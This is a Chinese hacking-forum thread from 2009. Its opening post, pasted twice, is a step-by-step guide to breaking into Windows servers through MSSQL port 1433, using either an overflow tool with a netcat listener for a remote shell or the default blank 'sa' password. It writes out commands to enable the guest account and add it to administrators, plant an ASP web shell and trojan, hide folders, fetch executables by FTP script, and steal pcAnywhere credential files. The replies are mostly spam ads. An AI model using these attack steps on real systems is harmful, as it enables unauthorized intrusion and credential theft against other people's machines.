WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2626查看
  • 5回复

主题

好友

154

积分

禁止访问

发表于 2009-6-2 06:52:39 |显示全部楼层
第一:1433的溢出攻击。在win2000机器上装了mssql的话,机器就会开1433端口。什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433窗。溢出1433需要两个工具:nc.exe和sql2.exe,在www.sandflee.net都有下载。进攻方法就两步:第一步,在自己机器上开一个cmd窗口。对了,你要用win2000的话,就开始-运行-写入cmd回车。这里我们只用2000,不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个窗口下打入命令c:>nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-写入cmd回车,再开一个窗口。在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。这里要作点说明:如何得到入侵网站ip?在cmd下c:>pingwww.xxxxx.com就可以看到了。自己的ip呢?在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以随意改成别的,但好像40和53成功率高一点。再是命令中的0不行的话,你就试试1或2。如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的c:\\winnt\\system32>.就是说,你已经进入它的机器里了。进去以后,你可以填加个用户了。net user guest /active:yes用这个命令,就将默认禁止的guest用户激活。net user guest 123456这样guest的密码变成123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。

  第二:1433空密码入侵。1433还有一个漏洞,就是如果默认安装的话,用户名是sa,密码是空的。那么我们就可以用supersqlexec.exe连接上去,这东东在www.sandflee.net也有下。

 1.如何找到sa空密码肉鸡?自己用流光扫吧。
 2.注意这是在win98下入侵sa的真实情况。局域网中的win98,在网吧里。
 3.工具:supersqlexec.exe、cmd.asp(www.sandflee.net有下)海阳顶端网木马(黑白)放在本机f:盘
 4.用supersqlexec联接成功。在命令行中输入:
net user guest /active:yes
(>指肉鸡回显下同)The command completed successfully.
net user guest 123456
> The command completed successfully
net localgroup administrators guest /add
> The command completed successfully.
这几个命令做完后,意思是将guest用户激活,密码是123456,并提升为admin。又是这个命令,复习一下。
 5.心中暗喜,换到2000系统下启动流光的种植者给它种个冰河。奇怪了,无论如何也不成功。(其实有时流光种植者不成功,但用手工方法就可以,是这样的,看这里)。
 6.换个用户名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add,命令失败。服务器没开   ipc$?
 7.回到sqlexe命令行中net start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光联不上,我百思  不得其解。(注:net start命令列表) 我后来换wn2000的cmd下net use \\\\ip\\ipc$ "123456" /user:"guest"也不能联接成功。
 8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip
 9.回到sqlexe命令行中net use x: \\\\本机ip\\f,将自己本机f:盘映射成为肉鸡的x:盘。过了一会,服务器  显示命令成功完成。(lcx注:net命令的详细用法)
 10.sqlexe命令行中运行set得知其主页位置在d:\\inetpub\\wwwroot。不错,服务器支持asp.你如果看不懂这 个命令,也可以根据其主页上某个图像文件名,然后dir *.jpg/s查找其主页位置。
 11.sqlexe命令行中copy x:\\cmd.asp d:\\inetpub\\wwwroot,这个目录是肉鸡网站的目录。
 12.回到ie中http://服务器ip/cmd.asp,出现了ie界面的dos.建个文件夹看看。
  md d:\\inetpub\\wwwroot\\aspmm
 13.sqlexec命令行中copy x:\\海阳顶端网木马\\*.* d:\\inetpub\\wwwroot\\aspmm\\.再将目录隐藏   
attrib +h d:\\inetpub\\wwwroot\\aspmm
 14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来   copy.呀!这台服务器不支持fso,海阳顶端网木马无法运行。那么我们试一下ftp上传。先将自己的文件*.exe上传到个人主页空间。
 15.在自己本机上建立up.txt内容如下:
open ftp1.go.163.com(说明:这里是指我用得是网易ftp)
username(说明:你的上传用户名)
password(说明:密码)
get lcx.exe(说明:你要上传到肉鸡的文件名)
bye(说明:退出ftp)
通过映射copy到肉鸡的c:\\up.txt
16.sqlexec命令行中ftp -s:c:\\up.txt(注:ftp的用法你在win2000里的帮助里可以很详细查到)等一会你 就看到lcx.exe已经在肉鸡在\\winnt\\system32\\下了。
17.运气好的话应该可以ipc联接成功,开个端口进去的。然后就可以做个代理、做个跳板了,可惜我运气 不好,这台机器无法ipc$成功,流光种植者无法联接。上传了好几个exe木马也无法运行。如何运行你上 传的木马,就看第二节
18. 通过仔细查找,得知肉鸡装了pcanywhere.查*.cif,该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里,好深的目录。怎样copy它呢?
19.通过一天的dos8.3规则的补习才知应是这样 :
copy c:\\winnt\\Profiles\\alluse~1\\applic~2\\symantec\\pcanyw~1\\*.cif d:\\inetpub\\wwwroot\\.然后通过 ie下载。其实,也可以用asp写一个小程序copy.我这儿写了一个。我放在这里了。说明:
http://www.s8s8.net/cgi-bin/topic.cgi?forum=26&topic=741
20.流光cif文件解码,得知用户名和密码。唯一遗憾的是ipc$无法成功,无法开端口进去,guest用户却可 以激活不知什么原因。

其实用supersqlexec.exe连上以后,可以有很多方法。像还可以用echo写我在第15步提到的那个up.txt.
echo 你要写的 >>up.txt就可以了,虽然肉鸡回显说写失败,其实已经成功了。就像一个人喊捉贼,贼吓跑了,家里却早乱了。注意,你用echo一次只可写一行.


第一:1433的溢出攻击。在win2000机器上装了mssql的话,机器就会开1433端口。什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433窗。溢出1433需要两个工具:nc.exe和sql2.exe,在www.sandflee.net都有下载。进攻方法就两步:第一步,在自己机器上开一个cmd窗口。对了,你要用win2000的话,就开始-运行-写入cmd回车。这里我们只用2000,不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个窗口下打入命令c:>nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-写入cmd回车,再开一个窗口。在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。这里要作点说明:如何得到入侵网站ip?在cmd下c:>pingwww.xxxxx.com就可以看到了。自己的ip呢?在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以随意改成别的,但好像40和53成功率高一点。再是命令中的0不行的话,你就试试1或2。如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的c:\\winnt\\system32>.就是说,你已经进入它的机器里了。进去以后,你可以填加个用户了。net user guest /active:yes用这个命令,就将默认禁止的guest用户激活。net user guest 123456这样guest的密码变成123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。

  第二:1433空密码入侵。1433还有一个漏洞,就是如果默认安装的话,用户名是sa,密码是空的。那么我们就可以用supersqlexec.exe连接上去,这东东在www.sandflee.net也有下。

 1.如何找到sa空密码肉鸡?自己用流光扫吧。
 2.注意这是在win98下入侵sa的真实情况。局域网中的win98,在网吧里。
 3.工具:supersqlexec.exe、cmd.asp(www.sandflee.net有下)海阳顶端网木马(黑白)放在本机f:盘
 4.用supersqlexec联接成功。在命令行中输入:
net user guest /active:yes
(>指肉鸡回显下同)The command completed successfully.
net user guest 123456
> The command completed successfully
net localgroup administrators guest /add
> The command completed successfully.
这几个命令做完后,意思是将guest用户激活,密码是123456,并提升为admin。又是这个命令,复习一下。
 5.心中暗喜,换到2000系统下启动流光的种植者给它种个冰河。奇怪了,无论如何也不成功。(其实有时流光种植者不成功,但用手工方法就可以,是这样的,看这里)。
 6.换个用户名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add,命令失败。服务器没开   ipc$?
 7.回到sqlexe命令行中net start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光联不上,我百思  不得其解。(注:net start命令列表) 我后来换wn2000的cmd下net use \\\\ip\\ipc$ "123456" /user:"guest"也不能联接成功。
 8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip
 9.回到sqlexe命令行中net use x: \\\\本机ip\\f,将自己本机f:盘映射成为肉鸡的x:盘。过了一会,服务器  显示命令成功完成。(lcx注:net命令的详细用法)
 10.sqlexe命令行中运行set得知其主页位置在d:\\inetpub\\wwwroot。不错,服务器支持asp.你如果看不懂这 个命令,也可以根据其主页上某个图像文件名,然后dir *.jpg/s查找其主页位置。
 11.sqlexe命令行中copy x:\\cmd.asp d:\\inetpub\\wwwroot,这个目录是肉鸡网站的目录。
 12.回到ie中http://服务器ip/cmd.asp,出现了ie界面的dos.建个文件夹看看。
  md d:\\inetpub\\wwwroot\\aspmm
 13.sqlexec命令行中copy x:\\海阳顶端网木马\\*.* d:\\inetpub\\wwwroot\\aspmm\\.再将目录隐藏   
attrib +h d:\\inetpub\\wwwroot\\aspmm
 14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来   copy.呀!这台服务器不支持fso,海阳顶端网木马无法运行。那么我们试一下ftp上传。先将自己的文件*.exe上传到个人主页空间。
 15.在自己本机上建立up.txt内容如下:
open ftp1.go.163.com(说明:这里是指我用得是网易ftp)
username(说明:你的上传用户名)
password(说明:密码)
get lcx.exe(说明:你要上传到肉鸡的文件名)
bye(说明:退出ftp)
通过映射copy到肉鸡的c:\\up.txt
16.sqlexec命令行中ftp -s:c:\\up.txt(注:ftp的用法你在win2000里的帮助里可以很详细查到)等一会你 就看到lcx.exe已经在肉鸡在\\winnt\\system32\\下了。
17.运气好的话应该可以ipc联接成功,开个端口进去的。然后就可以做个代理、做个跳板了,可惜我运气 不好,这台机器无法ipc$成功,流光种植者无法联接。上传了好几个exe木马也无法运行。如何运行你上 传的木马,就看第二节
18. 通过仔细查找,得知肉鸡装了pcanywhere.查*.cif,该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里,好深的目录。怎样copy它呢?
19.通过一天的dos8.3规则的补习才知应是这样 :
copy c:\\winnt\\Profiles\\alluse~1\\applic~2\\symantec\\pcanyw~1\\*.cif d:\\inetpub\\wwwroot\\.然后通过 ie下载。其实,也可以用asp写一个小程序copy.我这儿写了一个。我放在这里了。说明:
http://www.s8s8.net/cgi-bin/topic.cgi?forum=26&topic=741
20.流光cif文件解码,得知用户名和密码。唯一遗憾的是ipc$无法成功,无法开端口进去,guest用户却可 以激活不知什么原因。

其实用supersqlexec.exe连上以后,可以有很多方法。像还可以用echo写我在第15步提到的那个up.txt.
echo 你要写的 >>up.txt就可以了,虽然肉鸡回显说写失败,其实已经成功了。就像一个人喊捉贼,贼吓跑了,家里却早乱了。注意,你用echo一次只可写一行.

主题

好友

6

积分

禁止访问

发表于 2009-11-26 10:36:16 |显示全部楼层
北京安利产品直销店,特价销售安利产品,美国GNC产品,安利蛋白质粉,安利胶原蛋白,gnc葡萄籽

服务咨询电话: 13693514881,01087995548,13164280728,QQ:326580655,
http://www.yubest.com/    http://www.joyget.cn
http://www.letgot.com/   http://gw114.net.cn/
http://www.anli114.net   http://www.gnc114.com
http://www.bjpzm.com
所有安利产品(纽崔莱营养保健食品,安利家居系列,个人护理系列,雅姿美容护肤品系列)均从安利公司店铺直接进货,100%品质保障!!
购安利产品满300元北京三环之内免费送货,购安利产品满500元北京五环之内免费送货

安利纽崔莱保健品
产品名称………………产品规格…………市场价……本站优惠价
维生素 C………………200片…………  313.00 …………274.00
天然B族维生素…………90片…………  108.00………… 95.00
天然B族维生素…………300片………… 325.00…………284.00
小麦胚芽油营养胶囊……100粒………  162.00…………142.00
小麦胚芽油营养胶囊……225粒………  352.00…………308.00
果蔬纤维素嚼片…………90片………… 155.00…………136.00
钙镁片…………………250片…………  205.00…………179.00
铁质叶酸片………………120片…………122.00…………107.00
多种营养片………………90片………… 205.00…………179.00
儿童钙镁片………………100片…………150.00…………131.00
儿童铁质片………………100片…………100.00…………88.00
维生素C片(儿童型)……100片……… 125.00…………110.00
倍力键……………………90片×2袋……422.00…………369.00
蛋白质粉…………………400克…………252.00…………221.00
蛋白质粉…………………770克…………455.00…………398.00
深海鲑鱼油胶囊…………90粒………… 297.00…………260.00
茶族益脂胶囊……………30粒………… 275.00…………241.00
越橘益视胶囊……………60粒………… 252.00…………221.00
银杏健益胶囊……………100粒…………322.00…………282.00
松果菊健体片……………90片 …………252.00…………221.00
天然类胡萝卜素胶囊……180粒…………360.00…………315.00
薄荷香蒜片………………100片…………180.00…………158.00
儿童高蛋白饮品(草莓味)…875克……275.00…………241.00
儿童高蛋白饮品(巧克力)…875克……255.00…………224.00
美国原装安利纽崔莱
产品名称-------------编号------规格---市场价---特惠价
纽崔莱成人蛋白粉---A-7451-----450克----380-----260
纽崔莱B族维生素----A-4206-----300片----383-----240
天然C维生素--------A-4211-----300片----586-----350
钙镁D(新产品)----A-5880-----180片----275-----190
天然β-胡萝卜素----A-8058-----90片-----240-----155
卵磷脂VE营养嚼片---A-4042-----270片----450-----290
纽崔莱消化酵素-----A-8903-----90粒-----548-----330
硒质维生素E片------A-4261-----60片-----440-----278
纽崔莱深海鲑鱼油---A-5816-----90粒-----350-----230
儿童维生素C嚼片----A-5353-----180片----465-----290
得力多种营养片-----A-4230-----180片----478-----320
精装大宝X营养片----A-4300-----31天------860-----480
安利胶原蛋白-------A-7553-----60片-----298-----160
纽崔莱大蒜浓缩片---A-5923-----120片----355-----240
大蓟蒲公英护肝片---A-8084-----60片-----478-----320
异丙黄酮强骨素-----AA-89------60粒------395-----270
葡萄子抗氧化剂-----A-8603-----90片-----998-----590
山桑子护眼素胶囊---A-8007-----62粒-----456-----290
锯榈莓荨麻胶囊-----A-8004-----100粒----898-----450
升麻大豆浓缩片-----A-8085-----90片-----468-----300
血管循环保健胶囊---AA-0229----120粒----998-----560
纽崔莱辅酶Q10------A-8601-----60片-----796-----440
纽崔莱综合菌素片---100318-----60片-----415----295
葡萄糖胺胶囊维骨素--A-8086---120粒-----478-----335
安利乳酸菌包-------AA-114-----30包-----586-----370
紫椎花健体片-------A-5986-----120片----430-----270
蛇麻草浓缩片-------A-8992-----90片-----285-----210
安利银杏DHA胶囊----A-8005----100粒-----686-----380
安利月见草油胶囊---A-8006----100粒-----626-----360
安利铁质叶酸片-----102046----90片------240-----140
本店主要销售:安利纽崔莱,安利蛋白粉,安利胶原蛋白,安利蛋白粉,安利化妆品,安利保健品,安利胶原蛋白,安利雅姿,安利捷星,安利维生素e,安利倍力健,安利蛋白粉,安利胶原蛋白,安利钙片,安利纤维素,安利胶原蛋白,安利保健食品,安利胶原蛋白,安利雅蜜美国安利,安利牙膏,北京安利,安利蛋白质粉,安利钙镁片,安利维生素c,安利胶原蛋白,香港安利,安利主页,安利营养品,安利护肤品,安利叶酸,安利减肥,安利减肥产品,安利店铺,安利日用品,安利维生素,安利倍立健,安利维生素b

安利产品 http://www.yubest.com  
安利保健品 http://www.bjpzm.com  
安利欢乐购物http://www.gw114t.cn
安利欢乐购物http://www.joyget.cn
安利纽崔莱 http://www.letgot.com  
GNC健安喜 http://www.gnc114.com  
安利产品咨询 http://www.anli114.net
回复

使用道具 举报

主题

好友

1312

积分

金牌会员

发表于 2009-11-27 23:10:41 |显示全部楼层
看不懂!!
回复

使用道具 举报

主题

好友

42

积分

禁止访问

发表于 2010-1-21 11:25:26 |显示全部楼层
PP-20-P11-专业型PH计/电导计
产品型号:
PP-20-P11
产品名称:
专业型PH计/电导计
产品品牌:
赛多利斯SARTORIUS
产品价格:
21100 RMB
产品特点:
专业型电化学分析仪,多功能专业仪器符合pH测量,氧化还原,离子和电导最高要求
专业型
(PP-15-P11 PH计、PP-20-P11 PH计/电导计、PP-25-P11 PH计/离子计、PP-50-P11 PH计/电导计/离子计) ● pH测量精度最高达±0.001,mV测量精度达±0.1mV
● 自动温度补偿
● 简明的菜单操作提示
● 自动识别22种标准缓冲液(NIST、European和DIN等),最多5种用户自定义缓冲液
● 自动检查复合电极
● 自动校准提醒
● 稳定符号,表示读数已达稳定
● 报警提示数值超过允许范围
● 触摸键随时提供帮助功能
● 用户自定义测量的最短时间
● 图形显示最多5点校准曲线
● 同步显示测量值、温度
● 选择三合一多功能复合电极,能同时测量pH、温度和电导率
● 校准、测量结果记录符合GLP/GMP/ISO

RS232双向接口,可连接打印机或电脑
型号PP-15-P11PP-20-P11PP-25-P11PP-50-P11
PH测量范围-2.000~+20.000-2.000~+20.000-2.000~+20.000-2.000~+20.000
PH分辨率+0.001+0.001+0.001+0.001
PH精度
+0.002+0.002+0.002+0.002
MV测量范围(mv)+1800.0+1800.0+1800.0+1800.0
MV分辨率(mv)+0.1+0.1+0.1+0.1
MV精度(mv)+0.1+0.1+0.1+0.1
校准点(max)5555
自动识别缓冲液27272727
FET电极接头
温度范围(℃)-5.0~105.0-5.0~105.0-5.0~105.0-5.0~105.0
分辩率(℃)+0.1+0.1+0.1+0.1
精度(℃)+0.2+0.2+0.2+0.2
离子选择测量
校准点(max) 77
直接电位和增量方式(标准加/减,分析加/减)
电导率测量
校准点(max) 5 5
电导率、阻抗、盐度、TDS、NaCL盐度
温度显示
人工输入温度
自动温度补偿
输入电极数量2334
可选择测量结果参数
同时显示几种测量结果
日期/时间标记,记忆存储
校准提示
记录符合GLP
超大图形显示屏
RS-232双向接口
接通电源,自动检查
公司:上海秦迈仪器有限公司
销售总机:021-56710030
回复

使用道具 举报

主题

好友

22

积分

新手上路

发表于 2010-1-23 15:13:38 |显示全部楼层
支持一个啊
回复

使用道具 举报

主题

好友

958

积分

高级会员

发表于 2010-1-25 17:16:51 |显示全部楼层
以**黑客为荣, 以盗号挂马为耻
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-4-28 19:19 , Processed in 0.067280 second(s), 17 queries .

返回顶部